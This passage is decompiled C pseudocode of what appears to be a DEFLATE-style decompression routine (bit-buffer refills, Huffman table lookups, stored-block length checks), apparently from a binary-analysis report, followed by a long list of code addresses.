																										_t1900 =  *(_t2870 - 0xc) >>  *(_t2870 - 0x48);
																										 *(_t2870 - 0xc) = _t1900;
																										_t2086 =  *(_t2870 - 8) -  *(_t2870 - 0x48);
																										 *(_t2870 - 8) = _t2086;
																										_t2465 = 0;
																										if(0 != 0) {
																											goto L276;
																										} else {
																											if( *(_t2870 - 0x28) >= 0x10) {
																												if( *(_t2870 - 0x28) != 0x10 ||  *(_t2870 - 0x10) != 0) {
																													_t1937 =  *(_t2870 - 0x28);
																													_t841 = _t1937 + 0x13b004; // 0x70302
																													_t2315 =  *_t841;
																													 *(_t2870 - 0x24) = _t2315;
																													L322:
																													if( *(_t2870 - 8) >=  *(_t2870 - 0x24)) {
																														L336:
																														goto 0x140b37;
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														 *(_t2870 - 0x8c) = (_t1937 << _t2315) - 0x00000001 &  *(_t2870 - 0xc);
																														 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
																														_t1937 =  *(_t2870 - 8) -  *(_t2870 - 0x24);
																														 *(_t2870 - 8) = _t1937;
																														_t2315 = 0;
																														if(0 != 0) {
																															goto L322;
																														} else {
																															 *(_t2870 - 0x8c) =  *((char*)( *(_t2870 - 0x28) + 0x13b008)) +  *(_t2870 - 0x8c);
																															if( *(_t2870 - 0x28) != 0x10) {
																																 *(_t2870 - 0x108) = 0;
																															} else {
																																 *(_t2870 - 0x108) =  *( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2923) & 0x000000ff;
																															}
																															_push( *(_t2870 - 0x8c));
																															_push( *(_t2870 - 0x108));
																															_push( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2924);
																															_t2666 = 4 << 0;
																															 *((intOrPtr*)( *0x0013C1F4))();
																															_t2873 = _t2873 + 0xc;
																															 *(_t2870 - 0x10) =  *(_t2870 - 0x10) +  *(_t2870 - 0x8c);
																															goto L274;
																														}
																													} else {
																														L323:
																														_t1692 =  *(_t2870 - 4);
																														if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
																															 *(_t2870 - 0xbc) =  *( *(_t2870 - 4)) & 0x000000ff;
																															 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																															goto L334;
																														} else {
																															L324:
																															_t2086 =  *(_t2870 + 0x20) & 0x00000002;
																															if(_t2086 == 0) {
																																 *(_t2870 - 0xbc) = 0;
																																L332:
																																L334:
																																if(0 != 0) {
																																	goto L323;
																																} else {
																																	_t1937 =  *(_t2870 - 0xbc) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																																	 *(_t2870 - 0xc) = _t1937;
																																	_t2315 =  *(_t2870 - 8) + 8;
																																	 *(_t2870 - 8) = _t2315;
																																	if( *(_t2870 - 8) <  *(_t2870 - 0x24)) {
																																		goto L323;
																																	} else {
																																		goto L336;
																																	}
																																}
																															} else {
																																L325:
																																 *(_t2870 - 0x1c) = 1;
																																_t2465 =  *(_t2870 + 8);
																																 *_t2465 = 0x12;
																															}
																														}
																													}
																												} else {
																													L318:
																													 *(_t2870 - 0x1c) = 0xffffffff;
																													_t1692 =  *(_t2870 + 8);
																													 *_t1692 = 0x11;
																												}
																											} else {
																												 *((char*)( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2924)) =  *(_t2870 - 0x28);
																												_t2666 =  *(_t2870 - 0x10) + 1;
																												 *(_t2870 - 0x10) = _t2666;
																												goto L274;
																											}
																										}
																									} else {
																										if( *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4) >= 2) {
																											_t1900 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
																											 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2086 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
																											 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
																											 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
																											goto L307;
																										} else {
																											L278:
																											_t2694 =  *((short*)( *(_t2870 + 8) + (_t2086 << 1) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
																											 *(_t2870 - 0x40) = _t2694;
																											if( *(_t2870 - 0x40) < 0) {
																												if( *(_t2870 - 8) <= 0xa) {
																													goto L291;
																												} else {
																													 *(_t2870 - 0x48) = 0xa;
																													do {
																														_t1900 =  !( *(_t2870 - 0x40)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x48) & 0x00000001);
																														 *(_t2870 - 0x40) =  *((short*)( *(_t2870 + 8) + (_t2694 << 1) + 0x40 + 0x920 + _t1900 * 2));
																														_t2694 =  *(_t2870 - 0x48) + 1;
																														 *(_t2870 - 0x48) = _t2694;
																														if( *(_t2870 - 0x40) < 0) {
																															goto L288;
																														}
																														break;
																														L288:
																														_t1900 =  *(_t2870 - 0x48) + 1;
																													} while ( *(_t2870 - 8) >= _t1900);
																													if( *(_t2870 - 0x40) < 0) {
																														goto L291;
																													} else {
																														goto L304;
																													}
																												}
																											} else {
																												_t1900 =  *(_t2870 - 0x40) >> 9;
																												 *(_t2870 - 0x48) = _t1900;
																												if( *(_t2870 - 0x48) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x48)) {
																													L291:
																													_t2086 =  *(_t2870 - 4);
																													if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
																														 *(_t2870 - 0xb4) =  *( *(_t2870 - 4)) & 0x000000ff;
																														 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																														goto L302;
																													} else {
																														L292:
																														_t2465 =  *(_t2870 + 0x20) & 0x00000002;
																														if(_t2465 == 0) {
																															 *(_t2870 - 0xb4) = 0;
																															L300:
																															L302:
																															if(0 != 0) {
																																goto L291;
																															} else {
																																_t2086 =  *(_t2870 - 8);
																																 *(_t2870 - 0xc) =  *(_t2870 - 0xb4) << _t2086 |  *(_t2870 - 0xc);
																																_t1900 =  *(_t2870 - 8) + 8;
																																 *(_t2870 - 8) = _t1900;
																																if( *(_t2870 - 8) < 0xf) {
																																	goto L278;
																																} else {
																																	goto L304;
																																}
																															}
																														} else {
																															L293:
																															 *(_t2870 - 0x1c) = 1;
																															_t1692 =  *(_t2870 + 8);
																															 *_t1692 = 0x10;
																														}
																													}
																												} else {
																													L304:
																													goto L307;
																												}
																											}
																										}
																									}
																								}
																							}
																						} else {
																							L244:
																							 *(_t2870 - 0x1c) = 0xffffffff;
																							_t2086 =  *(_t2870 + 8);
																							 *_t2086 = 0x23;
																						}
																					}
																				}
																			} else {
																				L165:
																				 *(_t2870 - 0x1c) = 0xffffffff;
																				_t2465 =  *(_t2870 + 8);
																				 *_t2465 = 0xa;
																			}
																		} else {
																			L64:
																			if( *(_t2870 - 8) >= ( *(_t2870 - 8) & 0x00000007)) {
																				L78:
																				 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> ( *(_t2870 - 8) & 0x00000007);
																				_t2018 =  *(_t2870 - 8) & 0x00000007;
																				 *(_t2870 - 8) =  *(_t2870 - 8) - _t2018;
																				if(0 != 0) {
																					goto L64;
																				} else {
																					 *(_t2870 - 0x10) = 0;
																					L81:
																					if( *(_t2870 - 0x10) >= 4) {
																						 *(_t2870 - 0x10) =  *( *(_t2870 + 8) + 0x2920 + _t2018 * 0) & 0x000000ff | ( *( *(_t2870 + 8) + 0xbb04cd) & 0x000000ff) << 0x00000008;
																						_t2465 =  *(_t2870 + 8);
																						_t1692 = ( *(_t2465 + 0x2923) & 0x000000ff) << 8;
																						if( *(_t2870 - 0x10) == (( *( *(_t2870 + 8) + 0xbb04cd) & 0x000000ff | _t1692) ^ 0x0000ffff)) {
																							L117:
																							if( *(_t2870 - 0x10) == 0 ||  *(_t2870 - 8) == 0) {
																								L139:
																								if( *(_t2870 - 0x10) == 0) {
																									goto L531;
																								} else {
																									L140:
																									_t1692 =  *(_t2870 - 0x14);
																									if(_t1692 <  *((intOrPtr*)(_t2870 - 0x70))) {
																										L144:
																										_t1692 =  *(_t2870 - 4);
																										if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
																											if( *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14) >=  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4)) {
																												 *((intOrPtr*)(_t2870 - 0x104)) =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
																											} else {
																												 *((intOrPtr*)(_t2870 - 0x104)) =  *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14);
																											}
																											if( *((intOrPtr*)(_t2870 - 0x104)) >=  *(_t2870 - 0x10)) {
																												 *(_t2870 - 0x100) =  *(_t2870 - 0x10);
																											} else {
																												if( *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14) >=  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4)) {
																													 *(_t2870 - 0xfc) =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
																												} else {
																													 *(_t2870 - 0xfc) =  *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14);
																												}
																												 *(_t2870 - 0x100) =  *(_t2870 - 0xfc);
																											}
																											 *(_t2870 - 0x94) =  *(_t2870 - 0x100);
																											_push( *(_t2870 - 0x94));
																											_push( *(_t2870 - 4));
																											_push( *(_t2870 - 0x14));
																											 *((intOrPtr*)( *((intOrPtr*)(0x13c1f0))))();
																											_t2873 = _t2873 + 0xc;
																											 *(_t2870 - 4) =  *(_t2870 - 4) +  *(_t2870 - 0x94);
																											_t2465 =  *(_t2870 - 0x14) +  *(_t2870 - 0x94);
																											 *(_t2870 - 0x14) = _t2465;
																											 *(_t2870 - 0x10) =  *(_t2870 - 0x10) -  *(_t2870 - 0x94);
																											goto L139;
																										} else {
																											_t2086 =  *(_t2870 + 0x20) & 0x00000002;
																											if(_t2086 == 0) {
																												L149:
																												 *(_t2870 - 0x1c) = 0xffffffff;
																												_t2086 =  *(_t2870 + 8);
																												 *_t2086 = 0x28;
																											} else {
																												L146:
																												 *(_t2870 - 0x1c) = 1;
																												_t2465 =  *(_t2870 + 8);
																												 *_t2465 = 0x26;
																											}
																										}
																									} else {
																										L141:
																										 *(_t2870 - 0x1c) = 2;
																										_t2086 =  *(_t2870 + 8);
																										 *_t2086 = 9;
																									}
																								}
																							} else {
																								L119:
																								if( *(_t2870 - 8) >= 8) {
																									L133:
																									 *(_t2870 - 0x28) =  *(_t2870 - 0xc) & 0x000000ff;
																									 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> 8;
																									 *(_t2870 - 8) =  *(_t2870 - 8) - 8;
																									_t2086 = 0;
																									if(0 != 0) {
																										goto L119;
																									} else {
																										L134:
																										_t2465 =  *(_t2870 - 0x14);
																										if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
																											 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x28);
																											 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
																											_t2465 =  *(_t2870 - 0x10) - 1;
																											 *(_t2870 - 0x10) = _t2465;
																											goto L117;
																										} else {
																											L135:
																											 *(_t2870 - 0x1c) = 2;
																											_t1692 =  *(_t2870 + 8);
																											 *_t1692 = 0x34;
																										}
																									}
																								} else {
																									L120:
																									_t2086 =  *(_t2870 - 4);
																									if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
																										 *(_t2870 - 0xb8) =  *( *(_t2870 - 4)) & 0x000000ff;
																										 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																										goto L131;
																									} else {
																										L121:
																										_t2465 =  *(_t2870 + 0x20) & 0x00000002;
																										if(_t2465 == 0) {
																											 *(_t2870 - 0xb8) = 0;
																											L129:
																											L131:
																											if(0 != 0) {
																												goto L120;
																											} else {
																												 *(_t2870 - 0xc) =  *(_t2870 - 0xb8) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																												 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																												if( *(_t2870 - 8) < 8) {
																													goto L120;
																												} else {
																													goto L133;
																												}
																											}
																										} else {
																											L122:
																											 *(_t2870 - 0x1c) = 1;
																											_t1692 =  *(_t2870 + 8);
																											 *_t1692 = 0x33;
																										}
																									}
																								}
																							}
																						} else {
																							L114:
																							 *(_t2870 - 0x1c) = 0xffffffff;
																							_t2086 =  *(_t2870 + 8);
																							 *_t2086 = 0x27;
																						}
																					} else {
																						if( *(_t2870 - 8) == 0) {
																							L99:
																							_t1692 =  *(_t2870 - 4);
																							if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
																								 *((char*)( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2920)) =  *( *(_t2870 - 4));
																								 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																								goto L110;
																							} else {
																								L100:
																								_t2086 =  *(_t2870 + 0x20) & 0x00000002;
																								if(_t2086 == 0) {
																									 *((char*)( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2920)) = 0;
																									L108:
																									L110:
																									if(0 != 0) {
																										goto L99;
																									} else {
																										goto L111;
																									}
																								} else {
																									L101:
																									 *(_t2870 - 0x1c) = 1;
																									_t2465 =  *(_t2870 + 8);
																									 *_t2465 = 7;
																								}
																							}
																						} else {
																							L83:
																							if( *(_t2870 - 8) >= 8) {
																								L97:
																								 *((char*)( *(_t2870 + 8) +  *(_t2870 - 0x10) + 0x2920)) =  *(_t2870 - 0xc) & 0x000000ff;
																								 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> 8;
																								 *(_t2870 - 8) =  *(_t2870 - 8) - 8;
																								if(0 != 0) {
																									goto L83;
																								} else {
																									L111:
																									_t2018 =  *(_t2870 - 0x10) + 1;
																									 *(_t2870 - 0x10) = _t2018;
																									goto L81;
																								}
																							} else {
																								L84:
																								_t2086 =  *(_t2870 - 4);
																								if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
																									 *(_t2870 - 0xec) =  *( *(_t2870 - 4)) & 0x000000ff;
																									 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																									goto L95;
																								} else {
																									L85:
																									_t2465 =  *(_t2870 + 0x20) & 0x00000002;
																									if(_t2465 == 0) {
																										 *(_t2870 - 0xec) = 0;
																										L93:
																										L95:
																										if(0 != 0) {
																											goto L84;
																										} else {
																											 *(_t2870 - 0xc) =  *(_t2870 - 0xec) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																											 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																											if( *(_t2870 - 8) < 8) {
																												goto L84;
																											} else {
																												goto L97;
																											}
																										}
																									} else {
																										L86:
																										 *(_t2870 - 0x1c) = 1;
																										_t1692 =  *(_t2870 + 8);
																										 *_t1692 = 6;
																									}
																								}
																							}
																						}
																					}
																				}
																			} else {
																				L65:
																				_t2465 =  *(_t2870 - 4);
																				if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
																					 *(_t2870 - 0xb0) =  *( *(_t2870 - 4)) & 0x000000ff;
																					 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																					goto L76;
																				} else {
																					L66:
																					_t1692 =  *(_t2870 + 0x20) & 0x00000002;
																					if(_t1692 == 0) {
																						 *(_t2870 - 0xb0) = 0;
																						L74:
																						L76:
																						if(0 != 0) {
																							goto L65;
																						} else {
																							 *(_t2870 - 0xc) =  *(_t2870 - 0xb0) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																							 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																							if( *(_t2870 - 8) < ( *(_t2870 - 8) & 0x00000007)) {
																								goto L65;
																							} else {
																								goto L78;
																							}
																						}
																					} else {
																						L67:
																						 *(_t2870 - 0x1c) = 1;
																						_t2086 =  *(_t2870 + 8);
																						 *_t2086 = 5;
																					}
																				}
																			}
																		}
																	}
																} else {
																	L49:
																	_t2465 =  *(_t2870 - 4);
																	if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
																		 *(_t2870 - 0xe4) =  *( *(_t2870 - 4)) & 0x000000ff;
																		 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																		goto L60;
																	} else {
																		L50:
																		_t1692 =  *(_t2870 + 0x20) & 0x00000002;
																		if(_t1692 == 0) {
																			 *(_t2870 - 0xe4) = 0;
																			L58:
																			L60:
																			if(0 != 0) {
																				goto L49;
																			} else {
																				 *(_t2870 - 0xc) =  *(_t2870 - 0xe4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																				 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																				if( *(_t2870 - 8) < 3) {
																					goto L49;
																				} else {
																					goto L62;
																				}
																			}
																		} else {
																			L51:
																			 *(_t2870 - 0x1c) = 1;
																			_t2086 =  *(_t2870 + 8);
																			 *_t2086 = 3;
																		}
																	}
																}
															} else {
																_t2086 =  *(_t2870 + 0x20) & 0x00000001;
																if(_t2086 == 0) {
																	L581:
																	 *(_t2870 - 0x1c) = 0;
																	_t2465 =  *(_t2870 + 8);
																	 *_t2465 = 0x22;
																} else {
																	L533:
																	if( *(_t2870 - 8) >= ( *(_t2870 - 8) & 0x00000007)) {
																		L547:
																		 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> ( *(_t2870 - 8) & 0x00000007);
																		_t2086 =  *(_t2870 - 8) & 0x00000007;
																		 *(_t2870 - 8) =  *(_t2870 - 8) - _t2086;
																		_t1692 = 0;
																		if(0 != 0) {
																			goto L533;
																		} else {
																			 *(_t2870 - 0x10) = 0;
																			L550:
																			if( *(_t2870 - 0x10) >= 4) {
																				goto L581;
																			} else {
																				if( *(_t2870 - 8) == 0) {
																					L568:
																					_t2465 =  *(_t2870 - 4);
																					if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
																						 *(_t2870 - 0x90) =  *( *(_t2870 - 4)) & 0x000000ff;
																						 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																						goto L579;
																					} else {
																						L569:
																						_t1692 =  *(_t2870 + 0x20) & 0x00000002;
																						if(_t1692 == 0) {
																							 *(_t2870 - 0x90) = 0;
																							L577:
																							L579:
																							if(0 != 0) {
																								goto L568;
																							} else {
																								goto L580;
																							}
																						} else {
																							L570:
																							 *(_t2870 - 0x1c) = 1;
																							_t2086 =  *(_t2870 + 8);
																							 *_t2086 = 0x2a;
																						}
																					}
																				} else {
																					L552:
																					if( *(_t2870 - 8) >= 8) {
																						L566:
																						 *(_t2870 - 0x90) =  *(_t2870 - 0xc) & 0x000000ff;
																						 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >> 8;
																						 *(_t2870 - 8) =  *(_t2870 - 8) - 8;
																						if(0 != 0) {
																							goto L552;
																						} else {
																							L580:
																							_t1692 =  *( *(_t2870 + 8) + 0x10) << 0x00000008 |  *(_t2870 - 0x90);
																							 *( *(_t2870 + 8) + 0x10) = _t1692;
																							_t2086 =  *(_t2870 - 0x10) + 1;
																							 *(_t2870 - 0x10) = _t2086;
																							goto L550;
																						}
																					} else {
																						L553:
																						_t2465 =  *(_t2870 - 4);
																						if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
																							 *(_t2870 - 0xac) =  *( *(_t2870 - 4)) & 0x000000ff;
																							 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																							goto L564;
																						} else {
																							L554:
																							_t1692 =  *(_t2870 + 0x20) & 0x00000002;
																							if(_t1692 == 0) {
																								 *(_t2870 - 0xac) = 0;
																								L562:
																								L564:
																								if(0 != 0) {
																									goto L553;
																								} else {
																									 *(_t2870 - 0xc) =  *(_t2870 - 0xac) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																									 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																									if( *(_t2870 - 8) < 8) {
																										goto L553;
																									} else {
																										goto L566;
																									}
																								}
																							} else {
																								L555:
																								 *(_t2870 - 0x1c) = 1;
																								_t2086 =  *(_t2870 + 8);
																								 *_t2086 = 0x29;
																							}
																						}
																					}
																				}
																			}
																		}
																	} else {
																		L534:
																		_t1692 =  *(_t2870 - 4);
																		if(_t1692 <  *((intOrPtr*)(_t2870 - 0x18))) {
																			 *(_t2870 - 0xa8) =  *( *(_t2870 - 4)) & 0x000000ff;
																			 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																			goto L545;
																		} else {
																			L535:
																			_t2086 =  *(_t2870 + 0x20) & 0x00000002;
																			if(_t2086 == 0) {
																				 *(_t2870 - 0xa8) = 0;
																				L543:
																				L545:
																				if(0 != 0) {
																					goto L534;
																				} else {
																					 *(_t2870 - 0xc) =  *(_t2870 - 0xa8) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																					 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																					if( *(_t2870 - 8) < ( *(_t2870 - 8) & 0x00000007)) {
																						goto L534;
																					} else {
																						goto L547;
																					}
																				}
																			} else {
																				L536:
																				 *(_t2870 - 0x1c) = 1;
																				_t2465 =  *(_t2870 + 8);
																				 *_t2465 = 0x20;
																			}
																		}
																	}
																}
															}
														}
													}
												} else {
													goto L352;
												}
											}
										} else {
											goto L503;
										}
									} else {
										goto L504;
									}
								}
								goto L600;
							case 0x21:
								goto L584;
						}
					}
					L600:
					goto 0x140d42;
					asm("int3");
					 *(_t2465 + 4) = _t1692;
					goto L601;
				}
				L622:
				return _t1688;
			}

0x00132e6a
0x00132e6a
0x00132e74
0x00132e7f
0x00132e85
0x00132e90
0x00132e99
0x00132eb6
0x00132e9b
0x00132e9b
0x00132e9b
0x00132ec2
0x00132ed7
0x00132ee4
0x00132eed
0x00132ef3
0x00132efd
0x00132f03
0x00132f0c
0x00132f15
0x00132f1e
0x00132f27
0x00132f2d
0x00132f30
0x00132f33
0x00132f36
0x00132f38
0x00132f45
0x00132f51
0x00132f58
0x00000000
0x00132f62
0x00132f6c
0x00132f73
0x00132f7d
0x00132f83
0x00132f89
0x00132f8f
0x00132f95
0x00132f9f
0x00132fac
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00132fde
0x00132fc2
0x00132fc2
0x00132fc9
0x00132fcc
0x00132fe0
0x00132fe6
0x00000000
0x00132fe8
0x00132ff1
0x00132ffa
0x0013300f
0x00133026
0x00133028
0x00132fb2
0x00132fb2
0x00132fb8
0x0013301a
0x00133023
0x00000000
0x00132fba
0x00132fba
0x00132fbd
0x00132fc0
0x00133004
0x00000000
0x00000000
0x00000000
0x00000000
0x00132fc0
0x00000000
0x00000000
0x00000000
0x00133028
0x00132fe6
0x00000000
0x00000000
0x00133056
0x0013303a
0x0013303a
0x00133041
0x00133044
0x00133058
0x0013305e
0x00000000
0x00133060
0x00133069
0x00133072
0x00133087
0x0013309e
0x001330a0
0x0013302a
0x0013302a
0x00133030
0x00133092
0x0013309b
0x00000000
0x00133032
0x00133032
0x00133035
0x00133038
0x0013307c
0x00000000
0x00000000
0x00000000
0x00000000
0x00133038
0x001330a2
0x001330bc
0x001330e3
0x001330d7
0x001330d7
0x001330d7
0x001330ed
0x001330f3
0x001330f9
0x001330fc
0x0013310f
0x00133116
0x00133144
0x00133144
0x00133118
0x00133132
0x00133136
0x00000000
0x00133138
0x00133138
0x00133138
0x00133136
0x00133151
0x00133157
0x00133157
0x0013315e
0x00000000
0x00000000
0x00000000
0x00000000
0x0013315e
0x001330a0
0x0013305e
0x00000000
0x00000000
0x001331ba
0x00000000
0x001331bc
0x001331c2
0x00000000
0x001331c4
0x001331ca
0x001331d6
0x00000000
0x001331d6
0x001331c2
0x00000000
0x00000000
0x001332a6
0x00000000
0x001332a8
0x001332ae
0x00000000
0x001332b0
0x001332b6
0x001332c2
0x00000000
0x001332c2
0x001332ae
0x00000000
0x00000000
0x0013339b
0x00000000
0x0013339d
0x001333a3
0x00000000
0x001333a5
0x001333ab
0x001333b7
0x00000000
0x001333b7
0x001333a3
0x00000000
0x00000000
0x0013346b
0x00000000
0x0013346d
0x00133473
0x00000000
0x00133475
0x00133480
0x0013348c
0x00000000
0x0013348c
0x00133473
0x00000000
0x00000000
0x001336a9
0x00000000
0x001336ab
0x00000000
0x001336ab
0x00000000
0x00000000
0x001337fa
0x001337fa
0x00000000
0x00000000
0x0013396e
0x00000000
0x00133970
0x00133976
0x00000000
0x00133978
0x0013397e
0x0013398a
0x00000000
0x0013398a
0x00133976
0x00000000
0x00000000
0x00133adf
0x00000000
0x00133ae1
0x00133ae7
0x00000000
0x00133ae9
0x00133aef
0x00133afb
0x00000000
0x00133afb
0x00133ae7
0x00000000
0x00000000
0x0013407f
0x00000000
0x00134081
0x00134087
0x00000000
0x00134089
0x0013408f
0x0013409b
0x00000000
0x0013409b
0x00134087
0x00000000
0x00000000
0x00134221
0x00134221
0x00000000
0x00000000
0x0013426e
0x00000000
0x00134270
0x00134276
0x00000000
0x00134278
0x0013427e
0x0013428a
0x00000000
0x0013428a
0x00134276
0x00000000
0x00000000
0x001343cc
0x001343cc
0x00000000
0x00000000
0x00134567
0x00000000
0x00134569
0x0013456f
0x00000000
0x00134571
0x00134577
0x00134583
0x00000000
0x00134583
0x0013456f
0x00000000
0x00000000
0x001346f4
0x00000000
0x001346f6
0x00000000
0x001346f6
0x00000000
0x00000000
0x0013494b
0x00000000
0x0013494d
0x00134953
0x00000000
0x00134955
0x0013495b
0x00134967
0x00000000
0x00134967
0x00134953
0x00000000
0x00000000
0x00134ae5
0x00000000
0x00134ae7
0x00134aed
0x00000000
0x00134aef
0x00134af5
0x00134b01
0x00000000
0x00134b01
0x00134aed
0x00000000
0x00000000
0x00134c9a
0x00000000
0x00134c9c
0x00134ca2
0x00000000
0x00134ca4
0x00134caa
0x00134cb6
0x00000000
0x00134cb6
0x00134ca2
0x00000000
0x00000000
0x00135031
0x00000000
0x00135033
0x00135039
0x00000000
0x0013503b
0x00135041
0x0013504d
0x00000000
0x0013504d
0x00135039
0x00000000
0x00000000
0x00135269
0x00135269
0x00000000
0x00000000
0x00133d51
0x00133d51
0x00000000
0x00000000
0x0013317c
0x0013317c
0x00133160
0x00133160
0x00133167
0x0013316a
0x00000000
0x00000000
0x00134d7f
0x00134d7f
0x00000000
0x00000000
0x001336d9
0x00000000
0x001336db
0x00000000
0x00133701
0x00000000
0x00000000
0x0013354c
0x0013354c
0x00000000
0x00000000
0x001336f9
0x001336f9
0x00000000
0x00000000
0x00135126
0x00000000
0x00135128
0x0013512e
0x00000000
0x00135130
0x00135136
0x00135142
0x00000000
0x00135142
0x0013512e
0x00000000
0x00000000
0x001351ed
0x00000000
0x001351ef
0x001351f5
0x00000000
0x001351f7
0x001351fd
0x00135209
0x00000000
0x00135209
0x001351f5
0x00000000
0x00000000
0x0013359e
0x00000000
0x001335a0
0x001335a6
0x00000000
0x001335a8
0x001335ae
0x001335ba
0x00000000
0x001335ba
0x001335a6
0x00000000
0x00000000
0x00133658
0x00000000
0x0013365a
0x00000000
0x0013365a
0x00000000
0x00000000
0x00134e02
0x00134de6
0x00134de6
0x00134ded
0x00134df0
0x00134e04
0x00134dde
0x00134dde
0x00134de4
0x00134e1b
0x00134e23
0x00134e2c
0x00134dc3
0x00134dc6
0x00134dcf
0x00134dd2
0x00134ddc
0x00134463
0x00134466
0x0013446c
0x0013447d
0x00134481
0x0013461e
0x0013461e
0x00134636
0x0013463e
0x00134645
0x0013465e
0x00134665
0x0013468e
0x00134694
0x00134697
0x0013469a
0x00134647
0x0013464d
0x00134659
0x00134659
0x001346a3
0x001346ae
0x001346b4
0x001346b7
0x001346ba
0x001346bc
0x00000000
0x001346c2
0x001346c9
0x001346d0
0x001346d0
0x001346d6
0x001346fe
0x00134703
0x00134706
0x00000000
0x001346d8
0x001346d8
0x001346d8
0x001346df
0x001346e2
0x00135285
0x001346cb
0x00000000
0x001346cb
0x001346c9
0x00134487
0x00134490
0x00134602
0x00134609
0x00134612
0x0013461b
0x00000000
0x00134496
0x00134496
0x00134496
0x001344ae
0x001344b6
0x001344bd
0x001344e1
0x00000000
0x001344e3
0x001344e3
0x001344ea
0x001344ea
0x00134509
0x00134513
0x00134519
0x0013451c
0x00134523
0x00000000
0x00000000
0x00134528
0x0013452e
0x00000000
0x00000000
0x00000000
0x0013452e
0x00134534
0x00000000
0x00134536
0x00000000
0x00134536
0x00134534
0x001344bf
0x001344c2
0x001344c5
0x001344cc
0x0013453b
0x0013453b
0x00134541
0x001345a0
0x001345ac
0x00000000
0x00134543
0x00134543
0x00134546
0x00134549
0x0013458a
0x00134598
0x001345af
0x001345b1
0x00000000
0x001345b3
0x001345c1
0x001345c7
0x001345ca
0x001345d1
0x00000000
0x00000000
0x00000000
0x00000000
0x001345d1
0x0013454b
0x0013454b
0x0013454b
0x00134552
0x00134555
0x00135287
0x00134549
0x001344d6
0x001345d7
0x00000000
0x001345d7
0x001344cc
0x001344bd
0x00134490
0x0013446e
0x00134471
0x00134477
0x00134712
0x0013471f
0x00134722
0x0013472b
0x00134734
0x00134734
0x00134749
0x00134757
0x0013475e
0x0013476b
0x00134772
0x00134793
0x0013479b
0x001347a4
0x001347a7
0x00134760
0x00134766
0x00134766
0x001347b0
0x001347bb
0x001347c1
0x001347c4
0x001347d0
0x001347db
0x001347e8
0x001347eb
0x001347f4
0x001347fd
0x001347fd
0x00134812
0x00134820
0x00134827
0x00134834
0x0013483b
0x0013485a
0x0013485c
0x00134864
0x0013486d
0x00134870
0x00134829
0x0013482c
0x0013482f
0x0013482f
0x00134876
0x0013487b
0x0013487e
0x00134887
0x00134898
0x0013489e
0x001348a3
0x001348be
0x001348c4
0x001348cd
0x001348d0
0x00000000
0x001348a5
0x001348ab
0x001348b1
0x00000000
0x001348b1
0x001347d2
0x001348d5
0x001348de
0x001348e8
0x001348f2
0x001348f9
0x001348fc
0x001348ff
0x00134906
0x0013490d
